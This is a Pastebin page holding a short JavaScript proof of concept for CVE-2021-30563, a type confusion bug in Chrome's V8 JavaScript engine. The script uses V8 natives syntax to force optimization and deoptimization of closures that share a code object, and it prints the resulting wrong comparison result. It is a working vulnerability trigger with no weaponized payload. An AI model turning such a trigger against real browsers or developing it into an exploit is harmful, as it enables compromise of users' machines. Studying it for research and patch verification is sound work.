Guest User

PoC CVE-2021-30563 - Type Confusion in V8

a guest
Jul 30th, 2021
5,185
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. // PoC CVE-2021-30563 - Type Confusion in V8
  2. // https://twitter.com/Zeusb0x
  3.  
  4. // r --allow-natives-syntax
  5.  
  6. function make() {
  7.     const foo = function(x) {
  8.         var ab = [shClosure];
  9.         if (x > 10) {
  10.             temp[0] = 1;
  11.         }
  12.         return ab[0] === shClosure;
  13.     };
  14.     return foo;
  15. }
  16.  
  17. // Build the first closure, with function context specialization
  18. make();
  19. // Build and optimize a second closure.
  20. shClosure = make();
  21. temp = [1];
  22.  
  23. // Don't provide feedback for the greater than branch
  24. %PrepareFunctionForOptimization(shClosure);
  25. shClosure(1);
  26. %OptimizeFunctionOnNextCall(shClosure);
  27. shClosure(2);
  28.  
  29. // Build a third closure. This will share the code object with the second closure.
  30. fkClosure = make();
  31. // Return value is evaluated to a constant true;
  32. print(fkClosure(1));
  33. // Force deopt.
  34. // In the process of translating the native frame to an interpreted one, the JSFunction stack slot is used to represent the closure in question (as part of a captured object).
  35. // Because the code object is shared ab[0] will evaluate to fkClosure instead of shClosure in the following call.
  36. print(fkClosure(11)); // false
  37.  
  38.  
  39.  
  40.  
  41.  
  42.  
  43.  
  44.  
  45.  
  46.  
  47.  
  48.  
  49.  
  50.  
  51.  
  52.  
  53.  
  54.  
  55.  
  56.  
  57.  
  58.  
  59.  
  60.  
RAW Paste Data